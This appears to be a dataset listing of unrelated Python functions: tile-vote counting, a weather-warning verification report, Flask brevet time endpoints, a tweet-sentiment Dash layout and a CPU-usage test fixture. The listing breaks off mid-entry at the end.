open('/home/eduardo/ForestWatchers/ann2besttile/results/votes.txt','w')\n tileCount = []\n numberTasks = len(data)\n for task in range(numberTasks):\n tileCount.append([0] * 12)\n numberResults = len(data[task])\n fVotes.write(str(task)+\" \")\n for result in range(numberResults):\n fVotes.write(data[task][result]['answer']+\" \")\n if data[task][result]['answer'] == '2011352':\n tileCount[task][0] += 1\n elif data[task][result]['answer'] == '2011353':\n tileCount[task][1] += 1\n elif data[task][result]['answer'] == '2011355':\n tileCount[task][2] += 1\n elif data[task][result]['answer'] == '2011357':\n tileCount[task][3] += 1\n elif data[task][result]['answer'] == '2011358':\n tileCount[task][4] += 1\n elif data[task][result]['answer'] == '2011359':\n tileCount[task][5] += 1\n elif data[task][result]['answer'] == '2011360':\n tileCount[task][6] += 1\n elif data[task][result]['answer'] == '2011361':\n tileCount[task][7] += 1\n elif data[task][result]['answer'] == '2011362':\n tileCount[task][8] += 1\n elif data[task][result]['answer'] == '2011363':\n tileCount[task][9] += 1\n elif data[task][result]['answer'] == '2011364':\n tileCount[task][10] += 1\n elif data[task][result]['answer'] == '2011365':\n tileCount[task][11] += 1\n fVotes.write(\"\\n\")\n #Print info for debug\n if printStats == 1:\n print \"Stats for task \" + str(task)\n print \"Tile 00 (352) = \" + str(tileCount[task][0])\n print \"Tile 01 (353) = \" + str(tileCount[task][1])\n print \"Tile 02 (355) = \" + str(tileCount[task][2])\n print \"Tile 03 (357) = \" + str(tileCount[task][3])\n print \"Tile 04 (358) = \" + str(tileCount[task][4])\n print \"Tile 05 (359) = \" + str(tileCount[task][5])\n print \"Tile 06 (360) = \" + str(tileCount[task][6])\n print \"Tile 07 (361) = \" + str(tileCount[task][7])\n print \"Tile 08 (362) = \" + str(tileCount[task][8])\n print \"Tile 09 (363) = \" + str(tileCount[task][9])\n print \"Tile 10 (364) = \" + str(tileCount[task][10])\n print \"Tile 11 (365) = \" + str(tileCount[task][11])\n print \"Maximum value = \" + str(max(tileCount[task]))\n print \"Position = \" + str(tileCount[task].index(max(tileCount[task])))\n print \"\"\n fVotes.close()\n return tileCount", "def cowreport():\n central = pytz.timezone(\"America/Chicago\")\n yesterday = (utc() - datetime.timedelta(days=1)).astimezone(central)\n midnight = yesterday.replace(hour=0, minute=0)\n midutc = midnight.astimezone(pytz.UTC)\n begints = midutc.strftime(\"%Y-%m-%dT%H:%M\")\n endts = (midutc + datetime.timedelta(hours=24)).strftime(\"%Y-%m-%dT%H:%M\")\n api = (\n f\"http://iem.local/api/1/cow.json?begints={begints}&endts={endts}&\"\n \"phenomena=SV&phenomena=TO&lsrtype=SV&lsrtype=TO\"\n )\n data = requests.get(api, timeout=60).json()\n st = data[\"stats\"]\n if st[\"events_total\"] == 0:\n text = \"No SVR+TOR Warnings Issued.\"\n html = f\"<h3>IEM Cow Report</h3><pre>{text}</pre>\"\n txt = f\"> IEM Cow Report\\n{text}\\n\"\n return txt, html\n\n vp = st[\"events_verified\"] / float(st[\"events_total\"]) * 100.0\n text = (\n f\"SVR+TOR Warnings Issued: {st['events_total']:3.0f} \"\n f\"Verified: {st['events_verified']:3.0f} [{vp:.1f}%]\\n\"\n \"Polygon Size Versus County Size \"\n f\"[{st['size_poly_vs_county[%]']:.1f}%]\\n\"\n \"Average Perimeter Ratio \"\n f\"[{st['shared_border[%]']:.1f}%]\\n\"\n \"Percentage of Warned Area Verified (15km) \"\n f\"[{st['area_verify[%]']:.1f}%]\\n\"\n \"Average Storm Based Warning Size \"\n f\"[{st['avg_size[sq km]']:.0f} sq km]\\n\"\n f\"Probability of Detection(higher is better) [{st['POD[1]']:.2f}]\\n\"\n f\"False Alarm Ratio (lower is better) [{st['FAR[1]']:.2f}]\\n\"\n f\"Critical Success Index (higher is better) [{st['CSI[1]']:.2f}]\\n\"\n )\n\n html = f\"<h3>IEM Cow Report</h3><pre>{text}</pre>\"\n txt = f\"> IEM Cow Report\\n{text}\\n\"\n\n return txt, html", "def _calc_times():\n app.logger.debug(\"Got a JSON request\")\n km = request.args.get('km', 0, type=float)\n begin_date = request.args.get('begin_date')\n begin_time = request.args.get('begin_time')\n arrow_start = arrow.get(begin_date + \" \" + begin_time + \":00\")\n brevet_dist = request.args.get('brevet_dist', 999, type=int)\n app.logger.debug(\"km={}\".format(km))\n app.logger.debug(\"request.args: {}\".format(request.args))\n # FIXME: These probably aren't the right open and close times\n # and brevets may be longer than 200km\n percent120 = brevet_dist * 1.2\n possible_brev = [200, 300, 400, 600, 1000]\n if brevet_dist not in possible_brev:\n note = \"Current brevet distance is abnormal. Choose from 200, 300, 400, 600, or 1000\"\n elif km > percent120:\n note = \"Control location is more than 20% over the selected distance.\"\n else:\n note = \"\"\n open_time = acp_times.open_time(km, brevet_dist, arrow_start.isoformat())\n close_time = acp_times.close_time(km, brevet_dist, arrow_start.isoformat())\n result = {\"open\": open_time, \"close\": close_time, \"note\": note}\n return flask.jsonify(result=result)", "def _disp_times():\n fields = request.args.get('fields', type=str)\n format_type = request.args.get('format', type=str)\n top = request.args.get('top', type=int)\n token = request.args.get('token', type=str)\n results = {}\n\n result, length, code = retrieve(token, format_type, top, request_table[fields])\n return flask.jsonify(result=result, length=length, code=code)\n\n # elif code == 401: # Unauthorized\n # app.logger.debug(\"Token Expired! Let's log the user out.\")\n # return render_template('calc.html')", "def trends(max: int = None, until: str = None):\n for post in client.trends(max=max, until=until):\n print(json.dumps(post))", "def moderator_points():\n moderators = {}\n collection = constants.DB.moderators\n\n community_managers = [\n moderator[\"account\"] for moderator in\n collection.find({\"supermoderator\": True})]\n\n utopian_fest = constants.UTOPIAN_FEST.col_values(1)\n\n for moderator in set(community_managers + utopian_fest):\n moderators.setdefault(moderator, 0)\n if moderator in community_managers:\n moderators[moderator] += 100.0\n\n # Check for BOSSPOEM or TECHSLUT\n if moderator == \"espoem\" or moderator == \"techslut\":\n moderators[moderator] = 400.0\n\n # Utopian Fest bonus\n if moderator in utopian_fest:\n moderators[moderator] += 50.0\n\n # Save dictionary as JSON with date of last Thursday\n with open(\n f\"/home/amos/utopian/utopian/static/{constants.THIS_WEEK}.json\",\n \"w\") as fp:\n json.dump(moderators, fp, indent=4)", "def update_tweets_feed(n):\n \n # Retrieve the tweets\n first_tweet = get_value(df_1t, n)\n second_tweet = get_value(df_2t, n) \n third_tweet = get_value(df_3t, n)\n fourth_tweet = get_value(df_4t, n)\n fifth_tweet = get_value(df_5t, n)\n sixth_tweet = get_value(df_6t, n)\n seventh_tweet = get_value(df_7t, n)\n eighth_tweet = get_value(df_8t, n)\n nineth_tweet = get_value(df_9t, n)\n tenth_tweet = get_value(df_10t, n) \n \n # Compute the sentiment of each tweet\n sa_first_tweet = sentiment_analyzer_scores(first_tweet)\n sa_second_tweet = sentiment_analyzer_scores(second_tweet)\n sa_third_tweet = sentiment_analyzer_scores(third_tweet)\n sa_fourth_tweet = sentiment_analyzer_scores(fourth_tweet)\n sa_fifth_tweet = sentiment_analyzer_scores(fifth_tweet)\n sa_sixth_tweet = sentiment_analyzer_scores(sixth_tweet)\n sa_seventh_tweet = sentiment_analyzer_scores(seventh_tweet)\n sa_eighth_tweet = sentiment_analyzer_scores(eighth_tweet)\n sa_nineth_tweet = sentiment_analyzer_scores(nineth_tweet)\n sa_tenth_tweet = sentiment_analyzer_scores(tenth_tweet)\n \n # Return the tweet contents and a pie graph of the sentiment.\n \n return html.Div([\n html.Div([\n\n# First Tweet\n html.Div([\n html.Div([\n html.Pre(str(first_tweet)),\n ], \n className = 'ten columns',\n style = {\n 'backgroundColor': 'white',\n 'box-shadow': '2px 2px 10px #ccc',\n 'padding': '10px',\n 'padding-bottom': '25px',\n 'margin': '30px',\n 'overflowX': 'scroll',\n 'fontSize': '22px',\n }\n ),\n html.Div([\n dcc.Graph(figure = piegraph_asset(sa_first_tweet))\n ],\n className = 'nine columns',\n style = {\"padding-left\": \"550px\", }\n ),\n ], \n className = 'row' \n ),\n \n# Second Tweet\n \n html.Div([\n html.Div([\n html.Pre(str(second_tweet)),\n ], \n className = 'ten columns',\n style = {\n 'backgroundColor': 'white',\n 'box-shadow': '3px 3px 10px #ccc',\n 'padding': '10px',\n 'padding-bottom': '25px',\n 'margin': '30px',\n 'overflowX': 'scroll',\n 'fontSize': '22px'}\n ),\n html.Div([\n dcc.Graph(figure = piegraph_asset(sa_second_tweet))\n ],\n className = 'nine columns',\n style = {\"padding-left\": \"550px\"}\n ),\n ], \n className = 'row' \n ),\n \n # Third Tweet\n \n html.Div([\n html.Div([\n html.Pre(str(third_tweet)),\n ], \n className = 'ten columns',\n style = {\n 'backgroundColor': 'white',\n 'box-shadow': '3px 3px 10px #ccc',\n 'padding': '10px',\n 'padding-bottom': '25px',\n 'margin': '30px',\n 'overflowX': 'scroll',\n 'fontSize': '22px'}\n ),\n html.Div([\n dcc.Graph(figure = piegraph_asset(sa_third_tweet))\n ],\n className = 'nine columns',\n style = {\"padding-left\": \"550px\"}\n ),\n ], \n className = 'row' \n ),\n \n # Fourth Tweet\n \n html.Div([\n html.Div([\n html.Pre(str(fourth_tweet)),\n ], \n className = 'ten columns',\n style = {\n 'backgroundColor': 'white',\n 'box-shadow': '3px 3px 10px #ccc',\n 'padding': '10px',\n 'padding-bottom': '25px',\n 'margin': '30px',\n 'overflowX': 'scroll',\n 'fontSize': '22px'}\n ),\n html.Div([\n dcc.Graph(figure = piegraph_asset(sa_fourth_tweet))\n ],\n className = 'nine columns',\n style = {\"padding-left\": \"550px\"}\n ),\n ], \n className = 'row' \n ),\n\n\n # Fifth Tweet\n \n html.Div([\n html.Div([\n html.Pre(str(fifth_tweet)),\n ], \n className = 'ten columns',\n style = {\n 'backgroundColor': 'white',\n 'box-shadow': '3px 3px 10px #ccc',\n 'padding': '10px',\n 'padding-bottom': '25px',\n 'margin': '30px',\n 'overflowX': 'scroll',\n 'fontSize': '22px'}\n ),\n html.Div([\n dcc.Graph(figure = piegraph_asset(sa_fifth_tweet))\n ],\n className = 'nine columns',\n style = {\"padding-left\": \"550px\"}\n ),\n ], \n className = 'row' \n ),\n \n\n # Sixth Tweet\n html.Div([\n html.Div([\n html.Pre(str(sixth_tweet)),\n ], \n className = 'ten columns',\n style = {\n 'backgroundColor': 'white',\n 'box-shadow': '3px 3px 10px #ccc',\n 'padding': '10px',\n 'padding-bottom': '25px',\n 'margin': '30px',\n 'overflowX': 'scroll',\n 'fontSize': '22px'}\n ),\n html.Div([\n dcc.Graph(figure = piegraph_asset(sa_sixth_tweet))\n ],\n className = 'nine columns',\n style = {\"padding-left\": \"550px\"}\n ),\n ], \n className = 'row' \n ),\n \n # Seventh Tweet\n \n html.Div([\n html.Div([\n html.Pre(str(seventh_tweet)),\n ], \n className = 'ten columns',\n style = {\n 'backgroundColor': 'white',\n 'box-shadow': '3px 3px 10px #ccc',\n 'padding': '10px',\n 'padding-bottom': '25px',\n 'margin': '30px',\n 'overflowX': 'scroll',\n 'fontSize': '22px'}\n ),\n \n html.Div([\n dcc.Graph(figure = piegraph_asset(sa_seventh_tweet))\n ],\n className = 'nine columns',\n style = {\"padding-left\": \"550px\"}\n ),\n ], \n className = 'row' \n ),\n\n # Eighth Tweet\n \n html.Div([\n html.Div([\n html.Pre(str(eighth_tweet)),\n ], \n className = 'ten columns',\n style = {\n 'backgroundColor': 'white',\n 'box-shadow': '3px 3px 10px #ccc',\n 'padding': '10px',\n 'padding-bottom': '25px',\n 'margin': '30px',\n 'overflowX': 'scroll',\n 'fontSize': '22px'}\n ),\n \n html.Div([\n dcc.Graph(figure = piegraph_asset(sa_eighth_tweet))\n ],\n className = 'nine columns',\n style = {\"padding-left\": \"550px\"}\n ),\n ], \n className = 'row' \n ),\n\n # Nineth\n \n html.Div([\n html.Div([\n html.Pre(str(nineth_tweet)),\n ], \n className = 'ten columns',\n style = {\n 'backgroundColor': 'white',\n 'box-shadow': '3px 3px 10px #ccc',\n 'padding': '10px',\n 'padding-bottom': '25px',\n 'margin': '30px',\n 'overflowX': 'scroll',\n 'fontSize': '22px'}\n ),\n html.Div([\n dcc.Graph(figure = piegraph_asset(sa_nineth_tweet))\n ],\n className = 'nine columns',\n style = {\"padding-left\": \"550px\"}\n ),\n ], \n className = 'row' \n ),\n\n # Tenth Tweet\n \n html.Div([\n html.Div([\n html.Pre(str(tenth_tweet)),\n ], \n className = 'ten columns',\n style = {\n 'backgroundColor': 'white',\n 'box-shadow': '3px 3px 10px #ccc',\n 'padding': '10px',\n 'padding-bottom': '25px',\n 'margin': '30px',\n 'overflowX': 'scroll',\n 'fontSize': '22px'}\n ),\n html.Div([\n dcc.Graph(figure = piegraph_asset(sa_tenth_tweet))\n ],\n className = 'nine columns',\n style = {\"padding-left\": \"550px\"}\n ),\n ], \n className = 'row' \n ),\n ], style = {'overflowY': 'scroll', 'overflowX': 'hidden',\n 'maxHeight': '105ex', 'backgroundColor' : '#eaeaea'}\n ),\n \n ])", "def procfs_timeline():\n\n return [\n {\n \"timestamp\": \"2021-09-14T12:37:37.168817\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.610000000000014,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:37.669237\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.600000000000012,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:38.170142\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.600000000000012,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:38.670338\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.600000000000012,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:39.171321\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.600000000000012,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:39.671572\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.610000000000014,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:40.172503\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.600000000000012,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:40.672693\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.610000000000014,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:41.173552\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.600000000000012,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:41.673815\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.600000000000012,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:42.174560\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.600000000000012,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:42.674690\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.600000000000012,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:43.175441\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.600000000000012,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:43.675743\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.600000000000012,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:44.176551\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.600000000000012,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:44.677307\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.610000000000014,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:45.178049\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.610000000000014,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:45.678310\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.610000000000014,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:46.179120\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.600000000000012,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:46.679308\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.610000000000014,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:47.180223\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.610000000000014,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:47.680468\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.610000000000014,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:48.181316\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.610000000000014,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:48.681683\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.600000000000012,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:49.182522\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.600000000000012,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:49.682731\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.610000000000014,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:50.183680\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.610000000000014,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:50.683812\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.610000000000014,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:51.184792\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.610000000000014,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:51.685027\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.610000000000014,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:52.185709\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.610000000000014,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:52.686065\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.610000000000014,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:53.186929\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.36,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.600000000000012,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:53.687190\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.35,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.600000000000012,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:54.188031\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.35,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.600000000000012,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:54.688674\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.35,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.59000000000001,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:55.189489\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.35,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.59000000000001,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:55.690299\",\n \"sensor\": \"formula_group\",\n \"target\": [\"firefox_cgroup\", \"emacs_cgroup\",\n \"zsh_cgroup\", \"mongo_cgroup\"],\n \"usage\": {\n \"firefox_cgroup\": 8.35,\n \"emacs_cgroup\": 5.52,\n \"zsh_cgroup\": 0.01,\n \"mongo_cgroup\": 0.64,\n },\n \"global_cpu_usage\": 27.59000000000001,\n },\n {\n \"timestamp\": \"2021-09-14T12:37:56.191124\",\n \"sensor\": \"formula_group\",\n \"target\": 